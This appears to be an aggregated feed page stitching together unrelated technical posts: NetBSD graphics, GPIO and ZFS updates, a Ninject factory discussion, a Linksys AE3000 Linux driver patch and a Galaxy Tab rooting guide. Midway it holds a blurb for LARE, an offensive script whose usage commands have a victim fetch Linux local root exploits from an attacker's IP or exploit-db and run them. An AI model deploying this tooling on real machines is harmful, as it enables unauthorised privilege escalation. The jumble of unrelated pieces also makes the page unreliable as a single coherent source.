All boards with dedicated drivers will work as primary or secondary heads in X; boards which use wsfb will only work in X when they are the system console. For example, you can run an SS20 with four heads: a cg14 as the console plus an AG-10e and two CG6s.

There is also a generic kernel driver (genfb at sbus) which may or may not work with graphics hardware not listed here, depending on the board's firmware. If it provides standard properties for width, height, colour depth, stride and framebuffer address it should work, but not all boards do this. For example, the ZX doesn't give a framebuffer address, and there is no reason to assume it's the only one. Also, there is no standard way to program palette registers via firmware, so even if genfb works, colours are likely off. X should work with the wsfb driver, though it will likely look a bit odd.

Boards like the CG8 and CG12 have older, pre-wscons kernel support and weren't converted due to lack of hardware. They seem to be pretty rare though; in all the years I've been using NetBSD/sparc I have not seen a single user ask about them.

Finally, 3rd-party boards not mentioned here are unsupported for lack of hardware in the right hands.
Graphics hardware supported by NetBSD/sparc64 which isn't listed here should work the same way when running a 32-bit userland, but this is mostly untested.


          Google Summer of Code: Miniaturise NetBSD   

NetBSD has a reputation for being somewhat minimalist, and it is widely used in embedded systems. The high-level concepts behind miniaturising an operating system are quite straightforward and well understood. You throw away all the features you don't want and then you compress the remainder as much as possible. Simple, right?

It's such a simple idea that every embedded system developer builds their own system for doing this. This project aims to provide NetBSD with an integrated system for constructing embedded systems so that system developers can get on with the job of implementing their application-specific features. Of course, building a system that caters for all developers and not just one isn't quite as simple as it might seem.

This system lets the developer select and deselect NetBSD features by specifying which syspkgs they (don't) want on their system image. In addition, individual files and directories can be trimmed from the image for cases where syspkgs are too coarse.

3rd-party software can be automatically built and installed into the image if the developer constructs BSD makefiles for it, in the same way that NetBSD builds 3rd-party source in its own tree. Developers can, of course, just add a collection of files they already have if they want something simple.

Image formats that will be created are normal disk images (e.g. for CompactFlash cards), ISOs, gzipped tar files, and kernels with a built-in memory disk as root.


          GPIO Revisited   

NetBSD has had support for General Purpose Input/Output devices since the 4.0 release, when the GPIO framework from OpenBSD 3.6 was imported. GPIO devices, or gpios for short, provide an easy way to interface with electronic circuits, which can be as simple as an LED or provide more complex functionality like a 1-Wire or I2C bus.

Since the import of the GPIO framework into NetBSD, I have reworked larger parts of that subsystem in OpenBSD to address some problems and drawbacks. I have now imported these changes into NetBSD and continued to improve on them. The new GPIO framework retains backwards compatibility while adding new features: it integrates with the kauth(9) security framework, has its own config file format gpio.conf(5), and integrates with the system startup scripts in /etc/rc.d.

gpios are either wired internally for a specific function or connected to a header on the system board where electronic devices can be attached. On many embedded systems, LEDs controlled by gpios provide a simple user-feedback mechanism.

NetBSD's GPIO subsystem is used to control individual pins of gpios, but a device driver can also make use of GPIO pins through the gpio framework. In this case the driver maps the pins it needs, and they are no longer available for other uses.

Development goals and motivation

The gpio model found in NetBSD 4.0 is weak in a few regards:

A device driver that needs gpio pins must be configured in a kernel configuration file, and a custom kernel needs to be built. Such device drivers therefore cannot be attached to gpio(4) devices at runtime.

Since only the user of a machine can know the exact layout of its gpio pins, there is always the risk of damaging hardware. The use of gpios can be dangerous, and making them generally available can be a risk.

So the goal was to lock gpio configuration down behind an appropriate security mechanism and to make it possible to attach device drivers to gpio pins at runtime. As a convenience to users, individual pins can be named for later reference. Backwards compatibility had to be retained, since the older API has made it into a release.

Securing GPIO

Traditionally, UNIX systems had the notion of a securelevel; in this model, all configuration of gpios is done at an early boot stage at securelevel 0, and once the securelevel is raised it can no longer be changed. Pins that have been configured at securelevel 0 remain accessible at higher securelevels. NetBSD, however, no longer directly supports the securelevel model, but rather uses kauth(9) as its security mechanism (or, rather, hides the securelevel behind kauth(9)). You can still set the securelevel using the kern.securelevel sysctl or by setting securelevel=N in /etc/rc.conf. If you use the securelevel feature by setting it to a value higher than zero, your gpio layout and configuration can no longer be changed once the /etc/rc.d/securelevel script has run.

A New Syntax for gpioctl(8)

The changes to the kernel parts of course had to be reflected in the gpioctl(8) userland command, which at the same time got an all-new and easier command-line syntax.

A device driver that uses gpio pins can now be attached using the following command:

gpioctl gpio0 attach gpioow 4 1

In this example we attach a gpioow(4) device on pin 4 of the /dev/gpio0 device with a mask of 1. (The mask specifies how many and which pins are used by the driver, starting at an offset, which is the pin number.)

If the device had to be detached again, it could be done while still at securelevel 0 using the command

gpioctl gpio0 detach gpioow0

Notice how in the first example, only the driver name is given, but in the second example, the name of the driver instance is specified.

Individual pins can now be configured using a relatively easy syntax and at the same time be given a symbolic name. Once a pin has been named, it can be referenced either by pin number or by symbolic name.

gpioctl gpio0 <pin> set [in|out|inout|od|pp|tri|pu|pd|iin|iout] [<name>]

Once a pin has been configured this way, it will be accessible in the usual way even after the securelevel has been raised.

While still at securelevel 0, a pin can be unconfigured using the unset command as follows:

gpioctl gpio0 <pin> unset

Access to gpio pins is done as follows:

gpioctl gpio0 <pin> [0|1|2]

The /etc/gpio.conf configuration file format

To ease the configuration of GPIO pins during system startup, I introduced the /etc/gpio.conf configuration file, which is read by the /etc/rc.d/gpio script if the gpio variable in /etc/rc.conf is set to YES. The configuration file consists of one or more lines that follow the gpioctl(8) command-line syntax, but without the gpioctl command name. Lines starting with a '#' and empty lines are ignored. In the following example, we define an input pin and an error LED, and attach a 1-Wire bus to one pin of gpio0:

# Sample gpio configuration

gpio0 1 set in key
gpio0 3 set out error_led
gpio0 attach gpioow 8 1

Three steps to secure GPIO usage

  1. Edit the /etc/gpio.conf configuration file and carefully define your GPIO layout
  2. Set the gpio variable in /etc/rc.conf to YES
  3. Set the securelevel variable in /etc/rc.conf to 1

These steps will let you use the configured GPIO pins at runtime, but the layout cannot be changed, not even by the root user.


          Google Summer of Code zfs-port project status update 2   

ZFS as a whole has two main access paths: ZVOL and ZPL. In my first status update I said that I had ported the ZVOL layer to NetBSD and was able to create and use ZFS zpools and zvols (logical partitions exported from a disk storage pool called a zpool).

Over the last few weeks I have worked on the ZPL port. ZPL is the ZFS file system layer. I have ported the zfs_vfsops.c and zfs_vnops.c files to NetBSD. Today I have ZFS in a state where I can mount a ZFS dataset, copy the whole kernel source tree onto it, and finally build a NetBSD kernel on it.

$ su 
# modload /mod/solaris.kmod                                                                                                                       
# modload /mod/zfs.kmod                                                                                                                           
# zfs mount test/zfs
 # mount 
/dev/wd0a on / type ffs (local)
kernfs on /kern type kernfs (local)
ptyfs on /dev/pts type ptyfs (local)
/dev/zvol/dsk/test/zfs on /test/zfs type zfs (local)
# zfs list 
NAME        USED  AVAIL  REFER  MOUNTPOINT
test        391M  1.57G    18K  /test
test/tank    40M  1.61G    16K  -
test/zfs    351M  1.57G   351M  /test/zfs
test/zfs1    18K  1.57G    18K  /test/zfs1
# cd /test/zfs/src/sys/arch/i386/compile/GENERIC/
# make           
making sure the compat library is up to date...
`libcompat.a' is up to date.
making sure the kern library is up to date...
`libkern.o' is up to date.
#   compile  GENERIC/init_main.o
cc -ffreestanding -fno-zero-initialized-in-bss -O2 -std=gnu99 -fno-strict-aliasing -Werror -Wall -Wno-main -Wno-format-zero-length -Wpointer-arith -Wmissing-prototypes -Wstrict-prototypes -Wswitch -Wshadow -Wcast-qual -Wwrite-strings -Wno-unreachable-code -Wno-sign-compare -Wno-pointer-sign -Wno-attributes -Wextra -Wno-unused-parameter -Werror -Di386 -I. -I../../../../../common/include -I../../../../arch -I../../../.. -nostdinc -DMAXUSERS=64 -D_KERNEL -D_KERNEL_OPT -I../../../../lib/libkern/../../../common/lib/libc/quad -I../../../../lib/libkern/../../../common/lib/libc/string -I../../../../lib/libkern/../../../common/lib/libc/arch/i386/string -I../../../../dist/ipf -I../../../../external/isc/atheros_hal/dist -I../../../../external/isc/atheros_hal/ic -I../../../../../common/include -c ../../../../kern/init_main.c
#    create  vers.c
sh ../../../../conf/newvers.sh 
#   compile  GENERIC/vers.o
cc  -ffreestanding -fno-zero-initialized-in-bss  -O2 -std=gnu99 -fno-strict-aliasing   -Werror -Wall -Wno-main -Wno-format-zero-length -Wpointer-arith -Wmissing-prototypes -Wstrict-prototypes -Wswitch -Wshadow -Wcast-qual -Wwrite-strings -Wno-unreachable-code -Wno-sign-compare -Wno-pointer-sign -Wno-attributes -Wextra -Wno-unused-parameter  -Werror   -Di386 -I.  -I../../../../../common/include -I../../../../arch  -I../../../.. -nostdinc  -DMAXUSERS=64 -D_KERNEL -D_KERNEL_OPT -I../../../../lib/libkern/../../../common/lib/libc/quad -I../../../../lib/libkern/../../../common/lib/libc/string -I../../../../lib/libkern/../../../common/lib/libc/arch/i386/string   -I../../../../dist/ipf -I../../../../external/isc/atheros_hal/dist -I../../../../external/isc/atheros_hal/ic -I../../../../../common/include  -c vers.c
#      link  GENERIC/netbsd
ld -Map netbsd.map --cref -T ../../../../arch/i386/conf/kern.ldscript -Ttext c0100000 -e start -X -o netbsd ${SYSTEM_OBJ} ${EXTRA_OBJ} vers.o
NetBSD 5.99.14 (GENERIC) #1: Tue Jun 30 20:00:37 UTC 2009
   text    data     bss     dec     hex filename
8554455  407284  538396 9500135  90f5e7 netbsd

I tried to boot the built kernel and it worked like a charm. There is still much work to do: porting ZFS snapshot support, properly implementing security policies for ZFS access, testing ZFS ACL support, etc.

My work is accessible in my git repository at git://rachael.ziaspace.com/src.git in a branch called haad-zfs. You can easily clone this repo with git clone git://rachael.ziaspace.com/src.git. To check out the haad-zfs branch, run git checkout -b haad-zfs origin/haad-zfs from the src directory.


          Stay safe: how to install the patch for Linux bug CVE-2016-0728   

A security bug affecting Linux versions 3.8 and higher was recently identified. Although this bug (CVE-2016-0728) was first introduced into the Linux Kernel in 2012, it was only discovered and made public a few days ago. When we learned of the bug’s existence, we immediately patched all internal LeaseWeb servers. We advise everyone to patch their […]

The post Stay safe: how to install the patch for Linux bug CVE-2016-0728 appeared first on LeaseWeb Blog.


          New Post: IPresenterFactory is flawed   
Hi tsahiasher,

Thanks for checking out my project. And thanks for your feedback.


Whilst I do not agree that the design of IPresenterFactory is flawed, I do agree that the PresenterFactories for Ninject and StructureMap should probably have been written without the requirement that the IView parameter to the Presenter's constructor be named "view".

If you look at the UnityPresenterFactory, there is no such requirement and you can name the IView parameter anything you like.

I disagree that the IPresenterFactory is doing the job of the DI container. Firstly, we should be referring to an Inversion of Control (IoC) container rather than a DI container. Control of resolving the dependency is delegated to the IoC container; the factory handles the injection of the dependency. If you look at this post by Mark Seemann http://blog.ploeh.dk/2014/05/19/di-friendly-framework/ , you will see that it is not poor practice to use an IoC container inside a factory whose responsibility is returning the instantiated object to the framework. The class "WindsorCompositionRoot" in that article is the example I am referring to (in that case, it pertains to the ASP.NET MVC framework).

Going back to the Ninject example, you could probably rewrite the Create method as follows:
        public virtual IPresenter Create(Type presenterType, Type viewType, IView viewInstance)
        {
            if (presenterType == null)
                throw new ArgumentNullException("presenterType");
            if (viewType == null)
                throw new ArgumentNullException("viewType");
            if (viewInstance == null)
                throw new ArgumentNullException("viewInstance");

            Kernel.Bind<IView>().ToConstant(viewInstance).InTransientScope();
            Kernel.Bind<IPresenter>().To(presenterType).InTransientScope();

            var presenter = Kernel.Get<IPresenter>();
            
            Kernel.Unbind<IPresenter>();
            Kernel.Unbind<IView>();

            return presenter;
        }
As you can see, there is now no reliance on the IView parameter being named "view". I haven't thoroughly tested that, but it passes the unit tests.

I’ll make a quick comment on some other DI issues.
When you create your bindings for all of your services, you should not do that in the IPresenter factory. That IPresenter factory’s responsibility is solely to instantiate the relevant Presenter for the relevant IView. Your other services, which deliver data and process business rules, should be bound in a separate place.

So, if we take a simple example, the Program class’s Main method might look something like this:
 [STAThread]
 static void Main()
 {
     Application.EnableVisualStyles();
     Application.SetCompatibleTextRenderingDefault(false);

     IKernel kernel = new KernelFactory().CreateKernel(); // in here, bind all your services/dependencies etc.
     PresenterBinder.Factory = new NinjectPresenterFactory(kernel); 

     var mainForm = new MainForm();
     Application.Run(mainForm);
 }
The last, and probably most important, thing to note is that you will need to manage how and when your IoC container disposes of objects. Resolving objects with an IoC container is easy, but making decisions about their lifetime can get tricky, especially in a stateful environment like WinForms. On the web it is easier to scope things to the lifetime of an HttpRequest; with desktop development, you need to be careful not to create memory leaks.
So a memory profiling tool is a good idea, if you can get access to one. I know Redgate's memory profiler has a 30-day trial, so it would be a good idea to make sure your services and other dependencies are being disposed of when you expect them to be.

All the best.

          LARE - [L]ocal [A]uto [R]oot [E]xploiter is a Bash Script That Helps You Deploy Local Root Exploits   
[L]ocal [A]uto [R]oot [E]xploiter is a simple bash script that helps you deploy local root exploits from your attacking machine when your victim machine does not have internet connectivity.
The script is useful in scenarios where the victim machine has no internet connection, e.g. while you pivot into internal networks, or when playing CTFs that use a VPN to connect to their closed labs (e.g. hackthebox.gr), or even in the OSCP labs. The script uses local root exploits for Linux kernels 2.6 to 4.8.
This script is inspired by Nilotpal Biswas's Auto Root Exploit Tool

Usage:


1- Attacking a Victim in a Closed Network
You first have to set up the exploit arsenal on the attacking machine and start the apache2 instance using the following command: bash LARE.sh -a or ./LARE.sh -a


Once done with it, copy the script to the victim machine via any means (wget, ftp, curl, etc.) and run the exploiter locally with the following command: bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]



2- Attacking a Victim with Internet Access
In this scenario the script is run on the victim machine; it will fetch the exploits from the exploit-db GitHub repository and use them for exploitation directly. This is the original functionality of the Auto Root Exploit Tool with some fine tuning. Run the exploiter with the following command: bash LARE.sh -l or ./LARE.sh -l


Note
The script runs multiple kernel exploits on the machine, which can destabilise the system. It is highly recommended to use it as a last resort and in a non-production environment.


Download LARE

          RE: So far I am not impressed   
I strongly agree with you about Qt 4.5, but never underestimate a developer's pride. Even if WidgetOnCanvas were 100 times better than Clutter, I think they would prefer to continue developing Clutter. But I don't agree that Moblin is unimpressive. They are working hard on great things like (amazing) boot speed, and I think it's because of Moblin that Intel is investing so much in the X server, with things like kernel mode-setting, GEM, DRI2 and so on. I recommend this video:
          USB3 HDD does not power down with system :: Kernel & Hardware   

-- Delivered by Feed43 service


          Kernel Panic when Booting with Android USB Tethering :: Kernel & Hardware   



          head_64.o: warning :: Kernel & Hardware   



          udev conflicting device mode :: Kernel & Hardware   



          Cavaness' single leads Cedar Rapids to 6-2 win over Clinton   
CLINTON, Iowa (AP) -- Christian Cavaness hit a two-run single in the seventh inning, leading the Cedar Rapids Kernels to a 6-2 win over the Clinton LumberKings on Friday.
          Web developer to work on a Django platform, for a project called Promotickets based on a tree data structure   
Our company EventsLike wants to develop a platform called Promoticket, whose purpose is selling tickets for specific concerts and events using network-marketing strategies; each spectator who manages to sell tickets will earn promotional points as an incentive.

Functional requirements:

- Opening of the data structure, the binary tree
- Registration of a new user (registration of a NODE)
- Binary insertion operation
- Accumulation of points across the whole network, if and only if a new registration (new NODE) takes place
- Balance screen for PaqueteTickets points and RedPromo points
- Point transfers (of either PaqueteTickets or RedPromo points)
- User queries and searches within the binary tree
- Visualisation of the binary tree (n levels)
- Querying the balance transaction history

The person required must meet the following requirements:

* A developer with extensive knowledge of Django (latest version) is needed.
* The django-treebeard extension will be used (we will adapt it to the project; in some cases customisation of the extension will be needed).
* The database will be PostgreSQL.
* Preferably, though optionally, someone who works on an operating system based on the Linux kernel.
* There is a requirements specification document, open to improvements; the project is completely new.
* Knowledge of git (important for code versioning and teamwork).
* You will report to a project manager; communication will be fluid.


Category: IT & Programming
Subcategory: Web Programming
What is the scope of the project?: Create a new custom site
Is it a project or a position?: A project
I currently have: The specifications
Experience with this type of project: Yes (I have managed this type of project before)
Required availability: Full time
Required roles: Developer
          Data Center/Server Engineer - Intel - San Jose, CA   
The engineer will be responsible for handling all aspects of OS, Data Center software, Kernel, and middleware....
From Intel - Sat, 17 Jun 2017 10:23:09 GMT - View all San Jose, CA jobs
          Linux is a religion!   
Some fanatical Linux users give Linux so much importance that it seems they would give their lives for it like a suicidal Taliban; well, those at least earn a pile of virgins in heaven, while Linux users get nothing. Here are more reasons why Linux is a religion:
  • It has its dogmas: Thou shalt use only free software!
  • It has its idols: Stallman and Torvalds
  • It has its sacred symbols: Tux
  • Sacred book: the kernel
  • Rituals: kernel compilation
  • Demon: Windows/Gates
  • They will try to convince you to convert, and will never stop until they succeed or until you show them your shotgun
  • Discussions on the subject never end, or at least never end on good terms.
  • They attend mass: installfests, FLISOL
  • They have their sins: using Wine and proprietary software
  • "Counter-Strike is no excuse to virtualise Windows"
  • There are so many branches.
  • Ubuntu: the dominant one; its users are neither very fanatical nor very extremist (like Catholics)
  • gNewSense: fundamentalists, they use ONLY free software (like those who take the Bible literally)
  • Slackware: the one that refuses to change in any respect.
  • Debian: the sect full of crazy extremists who attack those who don't think like them
  • Promise: Linux has no flaws; it will free your PC from viruses and guide it along the righteous path.
  • "Linux is the only true path; Mac users are blind fanatics of Steve Jobs whose minds are closed by the hypnotising whiteness of the Macs."
  • Internal disputes over "GNOME or KDE"
  • The false prophet: GNU/Hurd
  • "Mono is a device of the Evil One to take possession of your soul"

          Geekly News   
It's Saturday and the week is over, but it left a good batch of news of interest to us geeks. Here is a summary of the most interesting things that happened across the blogosphere.

Microsoft releases code for Linux
And then it is discovered why
YouTube experiments with 3D
TwittAround presented
There will be a private beta of Google Wave in September
WiTricity could be ready in 18 months
Twitter's home page will be redesigned
Miro releases version 2.5

I'll try to publish a new edition of Geekly News every Saturday so you don't miss the most important news of each week.


          Microsoft will never change   

Perhaps the title is where I'm wrong, but what Microsoft has demonstrated recently confirms it: Microsoft seems never to learn, or to have not the slightest intention of improving. It has just been discovered that they violated the GPL licence. Just when it seemed Microsoft was changing and taking a step towards free software by releasing code for the Linux kernel under the GPL, it turns out they were violating these open-source licences.

And here I pause, because this is not merely something to anger Linux users because Microsoft doesn't support free software, because proprietary software is evil, and so on. This is a licence violation, committed by an enormous corporation, and one that will surely go unpunished.

The violation comes from some drivers that combined GPL code with proprietary binary code, something the GPL forbids. Microsoft later released the proprietary code in question, but announced it as if it were a good deed, when in reality they were patching the violation they had been committing.

Just one more thing to say: typical Microsoft.

More information: Microsoft releases code for Linux at MuyComputer
Microsoft violated the GPL at MuyLinux

Related articles:
What would Microsoft's Linux distro look like?
Microsoft, stay away from my Firefox!
If everything were made by Microsoft


          Ya está disponible la primera versión alpha para los sabores de Ubuntu 17.10   

Lubuntu Next Desktop

Tal y como nos informan desde SoftPedia, Canonical ha anunciado que ya están disponibles para su descarga e instalación las imágenes de la versión Alpha 1 de Ubuntu 17.10 Artful Aardvark, si bien se trata de los sabores de Ubuntu que sí quieren participar en esta etapa del desarrollo de la distro.

Durante todo su ciclo de desarrollo, y siguiendo con su propia tradición, aparecerán en total dos alphas y dos betas. La Alpha 1 es el primer lanzamiento de versiones en desarrollo, con lo que las imágenes en su mayoría están basadas en su mayoría en la última versión estable del sistema operativo.

Lo que esto significa es que el kernel y los gráficos que encontraremos son los de Ubuntu 17.04. O lo que es lo mismo: kernel 4.10, X.Org 1.19.3 y Mesa 17.1.2. Systemd, sin embargo, ha sido actualizado a su última versión, en concreto systemd 233. Recordamos que systemd sustituye a init.d como demonio para iniciar servicios. Entre los sabores que participan en esta Alpha 1 encontramos a Kubuntu 17.10, Lubuntu 17.10 y Ubuntu Kylin 17.10, cada una de ellas con su propio set de mejoras.

La Alpha 2 será la siguiente en llegar y lo hará el próximo 27 de julio (aunque también para los sabores de Ubuntu). Para los que quieran comprobar los avances que Ubuntu va realizando en la elaboración de su siguiente lanzamiento, tendrán que recurrir a las daily builds para ver qué es lo que va cambiando.

Ubuntu no liberará las alpha ni en la primera beta. La única versión de desarrollo que saldrá con el nombre de la distro principal será la Beta 2 (también conocida como Final Beta). Está previsto que esta segunda beta se libere el 28 de septiembre de este mismo año.

La primera beta se espera para el 31 de agosto, con la versión estable llegando a todos los usuarios el próximo 19 de octubre. Recordamos que Ubuntu 17.10 incluirá GNOME 3.26 como escritorio por defecto, después de que Canonical decidiese abandonar Unity y la convergencia.

Via | SoftPedia
At Genbeta | Life after convergence: what awaits Ubuntu after abandoning Mir and Unity 8?


          Security update for the Linux kernel 1077   
          Important CentOS 7 Linux Kernel Security Update Patches Five Vulnerabilities   

CentOS maintainer Johnny Hughes recently published a new security advisory for users of the CentOS 7 operating system series to inform them about an important kernel security update.

Read more


          Avast! Anti Virus Support for 64-bit Windows   
It comes as quite a relief that Avast! antivirus now fully supports the 64-bit Windows platform, in both the Avast! Home and Professional versions. This is a big stride for ALWIL Software, which had been closely watching the platform and following up on the whole question of supporting it. The 64-bit version of Windows XP supports up to 32 GB of RAM and 16 TB of virtual memory. Much antivirus software cannot support 64-bit Windows because of this massive address space. 64-bit Windows can run applications at great speed when working with big data sets.
Such applications can preload far more data into virtual memory, enabling quicker access by the processor's 64-bit extensions. This minimizes the time spent paging data into virtual memory and writing to storage devices, so applications run much faster and with greater control.
Regular 32-bit antivirus applications do not run on 64-bit Windows, because they depend on 32-bit kernel drivers. The Avast! antivirus application changes this equation by shipping native 64-bit drivers while still delivering the same protection achieved on 32-bit Windows. Both the 32-bit and 64-bit versions install in the same way.
          Cisco Linksys AE3000 WiFi USB Dongle and Linux Driver Installation   
So, back again with yet another geek niggle! This time it's to do with drivers.

[Bored of the crap I have written? Jump directly to the bottom to install the driver :).]

I wanted to experiment with setting up a web server and was very excited to get to work right away! So off I went: formatted my personal computer and installed Ubuntu 12.04 Precise Pangolin. I have 8 GB of RAM, good enough, eh? I wouldn't compromise with the 32-bit edition, so I went for the 64-bit one. I downloaded the live CD, installed it, and was thrilled to reach my desktop. Of course I installed it over a wired Ethernet cable that ran across the house, much to my wife's grumbling. I also installed ubuntu-desktop, for reasons known only to me, then unplugged the cable, plugged in my shiny new Cisco AE3000, and found out that neither ndiswrapper nor compiling the driver from the chipset vendor would work. Sheer frustration, without Internet.

Finally I decided to dig into the bare metal and figured out a working solution. Why ndiswrapper when you can get it working natively? So I ventured in, and after 30 minutes of trial and error, got the "Blue LED" blinking!! I thought I might as well share it here, so that someone could benefit from it.

First, why it won't work either way.

1. ndiswrapper 1.57 (the default that ships with Ubuntu 12.04) needs the 64-bit Windows driver, and Cisco does not ship that driver on the CD included with the WiFi dongle, nor is it available on the CCO website. I tested ndiswrapper on a 32-bit Ubuntu and even there it complained and did not work. If you use the "x86" driver under the Windows XP folder on the package CD (don't use Windows Vista or Windows 7 drivers with ndiswrapper; they are not supported for any cards, AFAIK), you will get an error saying "64 bit kernel detected by ndiswrapper". Bottom line: it won't work.

2. rt2800usb, the default module for the majority of Ralink chipsets that comes included with the kernel, does not support the RT3573 (the chipset used in the Cisco AE3000). Why? The RT3573 is a 3x3 chipset, relatively new to the Linux kernel, and development work is ongoing.

3. So why not go to the chipset vendor and ask for the driver? Thank god it is open source!! The problem: compilation works and the module gets installed, but the "Blue LED" won't blink!!! Why? Because the driver still doesn't recognize the USB device as a WiFi dongle. The AE3000 is not in its USB device table.

So, the solution: start coding!

1. Download and extract the source (provided here). Where you extract it doesn't matter.

2. Navigate to the source folder.

3. Make sure you have "g++", "build-essential" and "linux-headers" installed.

[The above steps are pretty basic, so I'm not posting the commands.]

4. Navigate to the following folder and open the file below in your favorite editor.

cd <driver-source-folder>
vim common/rtusb_dev_id.c

5. Look for the following lines and add the line marked below.
[Note: the marked line is the only change you need to make. It is the USB vendor/product ID for the Cisco AE3000.]

#ifdef RT3573
    {USB_DEVICE(0x148F,0x3573)}, /* Ralink 3573 */
    {USB_DEVICE(0x7392,0x7733)}, /* Edimax */
    {USB_DEVICE(0x0B05,0x17AD)}, /*ASUS */
    {USB_DEVICE(0x13B1,0x003B)}, /* Cisco LinkSys AE3000 */
#endif /* RT3573 */
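Conceptually, that table is all the driver consults at probe time: it binds only when the dongle's vendor:product pair (13B1:003B, as `lsusb` would show it) appears in the list. A toy Python sketch of that lookup, using the IDs from the table above (the lookup itself is purely illustrative, not kernel code):

```python
# Toy model of how a USB driver's device ID table is matched at probe time.
# The (vendor, product) pairs mirror rtusb_dev_id.c above; the dict lookup
# is an illustration of the matching logic, not actual kernel code.
RT3573_ID_TABLE = {
    (0x148F, 0x3573): "Ralink 3573",
    (0x7392, 0x7733): "Edimax",
    (0x0B05, 0x17AD): "ASUS",
    (0x13B1, 0x003B): "Cisco Linksys AE3000",  # the line added in step 5
}

def probe(vendor, product):
    """Return the matched device name, or None if the driver won't bind."""
    return RT3573_ID_TABLE.get((vendor, product))

# Without the added entry, probe(0x13B1, 0x003B) returns None, which is
# exactly why the stock source compiled fine but never lit the LED.
```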

6. Close the file, and compile and install the driver.

sudo make -j10 <------- "sudo" is needed
sudo make install

sudo depmod -a
sudo modprobe -v rt3573sta

Bingo!! The LED will blink and your device is ready to use.

Easy enough!! Please add a '+1' :p :) !!


          Loading ICE CREAM SANDWICH on a Verizon CDMA Samsung Galaxy Tab   
[Disclaimer: The contents of this post could lead to bricking your tablet. Do not blame me for a burnt tablet; you try this at your own responsibility. My only contribution is putting together all the steps I went through and sharing my personal experiences and emotions in this blog. The low-level kernel work was done by many, many geniuses, and links to it are spread all over the Internet on XDA, RootzWiki, MyDroidWorld and many other forums.]

OK, with the disclaimer on, I have just protected myself against any potential lawsuits :).
Fine, now to get my hands dirty on my first ever experiment with rooting. Honestly, I had never tried rooting until this post.
I purchased my first tablet computer, the Verizon CDMA 7" Galaxy Tab, in February. I had heard stories of people experimenting with custom ROMs and CyanogenMod; honestly, I had appreciated all their work only by reading the posts. All of a sudden, like a bolt of lightning, I realized: why not experiment for myself? What's the worst that could happen, I end up with a $200 brick? (Well, that is not entirely true, as you will see from my experiences below. In short, I bricked my Galaxy Tab 17 times before I got it all right, so don't panic: unless you are extremely careless, you can still recover it. Read the disclaimer.)
My search and findings were fruitful in a way, and I envisioned writing up my experiences in this blog as a one-stop hub amalgamating all the steps required to go from a stock, factory-sealed tablet to a rooted Ice Cream Sandwich (Android 4.0.1) tablet. I will try to include all the software I used and post as many links as are required to get the tasks done.

[Working in this ICS ROM]
1. WiFi: a little flaky while re-scanning networks, but OK for an alpha. Connections work perfectly.
2. Bluetooth
3. GPS
4. SD card

[Please let me know if any link does not work; I shall repost it. If any step fails, let me know and I will correct it.]
[If you brick your device because of these steps, most likely you can unbrick it using Heimdall (steps to return to the stock ROM are mentioned below), but use at your own risk.]

OK, enough said, now to work!

1. Get a Samsung Galaxy Tab from a retail store or online. If you are like me, owning a CDMA Verizon Galaxy Tab, read on!

2. These steps are __only__ for the Verizon CDMA Galaxy Tab; I have not tried this on any other device.

3. If you have stock Froyo, let's first upgrade that. We need a rooted ROM to install ClockWorkMod (CWM). CWM is an application in its own right that facilitates easy installation of custom ROMs on Android devices.

4. Installing Heimdall 1.1.1: Grab Heimdall, a tool used to flash kernels and ROMs (aka firmware). At the time of writing, Heimdall is at 1.3.1, but I'm old school: 1.1.1 has always worked well for me, so I will stick with it. The software can be obtained from the Heimdall download link.

5. Extract the compressed file to a folder and set it aside; we will come back to it later.

6. Installing the Windows USB device drivers for your Galaxy Tab: Download the Samsung Galaxy Tab USB driver for Windows 7 (or your OS) from the link. The link leads to the installation of the Samsung Kies software. Connect your Tab to the PC and install the driver using Samsung Kies.

7. Now launch the "Zadig" software from the "Drivers" folder of the extracted Heimdall tool.
8. Under "Options" select "List All Devices", and if you installed the USB device driver correctly in the earlier steps, you will find "Samsung Android Composite ADB Interface" in the "USB Devices" drop-down list.

9. Now choose "Install Driver" and accept the warning message. This is a one-time process; from now on you won't have to repeat steps 6 through 9.

10. Flashing a rooted Verizon stock Gingerbread kernel: I got my rooted stock ROM from the link; details on how to flash it are below, or you can refer to the post at XDA.

11. Place the Galaxy Tab in download mode: power off the device, then power it on again by holding the "Power + Volume Down" buttons together for about 3-4 seconds. You will see a "Downloading" message.

12. Open "heimdall-frontend.exe" from the extracted Heimdall folder.
13. Place all the files from the extracted stock ROM in the correct slots. [It is very important that you do this step correctly if you value your Galaxy Tab.]
FactoryFS = factoryfs.rfs
Kernel (zImage) = zImage
Param.lfs = param.lfs
Cache = cache.rfs
Database Data = dbdata.rfs
Recovery = recovery.bin
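The mapping above is pure file-to-partition-slot bookkeeping, and leaving any slot empty is exactly the mistake the warning in step 13 is about. A hypothetical sanity-check sketch in Python (the helper and its name are mine, not part of Heimdall; the slot names mirror the list above):

```python
# Hypothetical sanity check for the Heimdall file/partition mapping in
# step 13. The slot and file names mirror the list above; the check itself
# is illustrative and not part of the Heimdall tool.
REQUIRED = {
    "FactoryFS": "factoryfs.rfs",
    "Kernel (zImage)": "zImage",
    "Param.lfs": "param.lfs",
    "Cache": "cache.rfs",
    "Database Data": "dbdata.rfs",
    "Recovery": "recovery.bin",
}

def missing_slots(selected):
    """Return the partition slots that have not been assigned a file yet."""
    return sorted(set(REQUIRED) - set(selected))

# Forgetting even one slot before hitting "Start" is how tabs get bricked.
```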

14. Once the files are placed appropriately, click "Start". Wait patiently for some time; your Galaxy Tab will reboot by itself once the process completes successfully. You may have to push "Start" a couple of times before it works correctly.
15. Once the Tab reboots, power it down immediately [do not let it boot fully after flashing].

16. Power up again in recovery mode by holding the "Power + Volume Up" buttons together for about 3-4 seconds; once you see the "Samsung" logo, keep holding "Volume Up" and release "Power". You will see a "Recovery mode". This is the "Android System Recovery" software, not ClockWorkMod recovery [we will install that later].
17. Once in recovery, use the "Volume" buttons to navigate up and down and the "Home" button as the "Enter" key. Wipe the "data/cache" and "cache" partitions, and reboot.
18. You now have a fully working rooted Verizon stock Gingerbread 2.3.5 with the RFS partition format [what this is, I will come to later]. You can stop at this point if you like.
 
19. Converting the file system to EXT4: Next, we need to convert our file system to the EXT4 partition type. Why? Because it is faster: user experience and app loading are better on EXT4, and the ICS port I'm using requires a Gingerbread bootloader already on an EXT4 partition. I was originally stuck here for long hours, until some experimentation.
